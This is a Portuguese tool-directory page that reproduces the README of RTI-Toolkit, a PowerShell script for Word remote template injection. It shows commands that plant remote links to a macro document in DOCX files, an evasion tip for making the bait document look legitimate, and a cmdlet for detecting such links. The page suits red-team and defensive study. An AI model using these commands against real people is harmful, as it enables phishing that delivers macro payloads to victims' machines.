Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RTI-Toolkit — Kit de ferramentas PowerShell para ataques e defesa de injeção remota de modelos. Injeta links maliciosos em documentos do Office Word para phishing, com módulos de identificação para equipes azuis. | Kitploit
Ferramentas/GitHubGitHub/nickvourd/rti-toolkit
Ferramentas de PhishingPhishingTestes de PenetraçãoRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

Kit de ferramentas PowerShell para ataques e defesa de injeção remota de modelos. Injeta links maliciosos em documentos do Office Word para phishing, com módulos de identificação para equipes azuis.

Ver Repositório
559há 2 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RTI-Toolkit

Kit de Injeção de Template Remoto

Descrição

O RTI-Toolkit é um kit de ferramentas PowerShell de código aberto para ataques de Injeção de Template Remoto. Este kit inclui um script PowerShell chamado PS-Templator.ps1 que pode ser usado tanto numa perspetiva ofensiva quanto defensiva.

A tabela seguinte apresenta os principais módulos (cmdlets) do PS-Templator.ps1:

CmdletDescriçãoPerspetiva
Invoke-TemplateImplementa links de template remoto nos modelos padrão do Office WordOfensiva
Invoke-RegularImplementa links de template remoto em documentos normais do Office Word sem templateOfensiva
Invoke-IdentifyIdentifica links de template remoto em documentos Office Word docx com/sem templateDefensiva

⚠️ O PS-Templator.ps1 suporta apenas ficheiros DOCX.

ℹ️ Esta ferramenta é referenciada pelo National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) em CVE-2025-65318 e CVE-2025-65319.

Versão

1.0.0

Licença

Esta ferramenta está licenciada sob a License: MIT.

Agradecimentos

Agradecimentos especiais aos meus amigos @Papadope9 e Stavros Gkounis (também conhecido como purpl3ph03n1x), que prestaram uma ajuda inestimável durante a fase de testes beta da ferramenta.

Esta ferramenta foi inspirada durante uma Avaliação de Red Teaming iCAST com @S1ckB0y1337 há alguns anos.

A Supernova foi criada com ❤️ por @nickvourd.

Índice

  • RTI-Toolkit
    • Descrição
    • Versão
    • Licença
    • Agradecimentos
    • Índice
    • Injeção de Template Remoto (RTI)
    • Instalação
    • Cmdlets
      • Invoke-Template
        • Exemplo de Invoke-Template
      • Invoke-Regular
        • Exemplo de Invoke-Regular
        • Exemplo 2 de Invoke-Regular
      • Invoke-Identify
        • Exemplo de Invoke-Identify
        • Exemplo 2 de Invoke-Identify
    • Referências

Injeção de Template Remoto (RTI)

A Injeção de Template Remoto (RTI) no contexto do Microsoft Office refere-se a um tipo específico de vulnerabilidade de segurança que pode ser explorada através de templates maliciosos em documentos do Office (ex.: Word, Excel, PowerPoint).

Por exemplo, num ficheiro DOCX, o conteúdo é armazenado em formato XML dentro do arquivo, e alguns destes ficheiros XML podem referenciar recursos ou templates externos. Os atacantes podem de facto manipular estes ficheiros XML para inserir links ou conteúdos maliciosos que podem potencialmente explorar vulnerabilidades ou enganar os utilizadores.

Este é um ataque baseado em Macros.

Instalação

Para carregar o PS-Templator.ps1 como módulo na memória, execute o seguinte comando:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ O PS-Templator.ps1 funciona sem a necessidade de instalar quaisquer dependências adicionais.

ℹ️ O PS-Templator.ps1 funciona como módulo PowerShell.

ℹ️ O PS-Templator.ps1 foi testado numa máquina Windows 10 com Office 2019 Professional plus.

Cmdlets

Invoke-Template

Invoke-Template é um cmdlet que implementa links de template remoto nos modelos padrão do Office Word.

Exemplo de Invoke-Template

Assumindo que tem um modelo Word padrão, como um destes:

All Words Templates

Guardado como, por exemplo, 'Name.docx':

Default Word Template Document

Se usar o cmdlet Invoke-Template pode inserir um link malicioso neste docx:

⚠️ Antes de executar Invoke-Template, certifique-se de guardar o documento e fechá-lo (terminar o seu processo).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Resultado:

Invoke-Template-1

Como pode ver, o módulo Invoke-Template mantém uma cópia de segurança do documento original e fornece o caminho completo para o documento malicioso.

Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /word/_rels/settings.xml.rels, pode ver o link malicioso:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular é um cmdlet que implementa links de template remoto em documentos normais do Office Word sem templates.

Exemplo de Invoke-Regular

Assumindo que tem um documento Word normal sem template, como este:

Blank Document

Guardado como, por exemplo, 'Doc1.docx':

Word Document

Se usar o cmdlet Invoke-Regular pode inserir um link malicioso neste docx:

⚠️ Antes de executar Invoke-Regular, certifique-se de guardar o documento e fechá-lo (terminar o seu processo).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Resultado:

Invoke-Regular-1

Como pode ver, o módulo Invoke-Regular mantém uma cópia de segurança do documento original e fornece o caminho completo para o documento malicioso.

Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /word/_rels/settings.xml.rels, pode ver o link malicioso:

Invoke-Regular-Debug-1

Exemplo 2 de Invoke-Regular

Numa perspetiva OPSEC, pode usar -TemplateName em conjunto com o módulo Invoke-Regular. Isto fará com que o seu documento malicioso pareça mais legítimo se alguém tentar analisá-lo.

Aqui está um exemplo:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Resultado:

Invoke-Regular-Example-2

Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /docProps/app.xml, pode ver o nome do template falso:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-Identify é um cmdlet que identifica links de template remoto em documentos Office Word docx com/sem template.

Exemplo de Invoke-Identify

Assumindo que tem um documento Word malicioso:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Resultado:

Invoke-Identify Malicous Example

Exemplo 2 de Invoke-Identify

Assumindo que tem um documento Word não malicioso:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Resultado:

Invoke-Identify Clean Example

Referências

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub por John Woodman
  • Invoke-Templator GitHub por Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub por Inf0secRabbit
Baixar ferramenta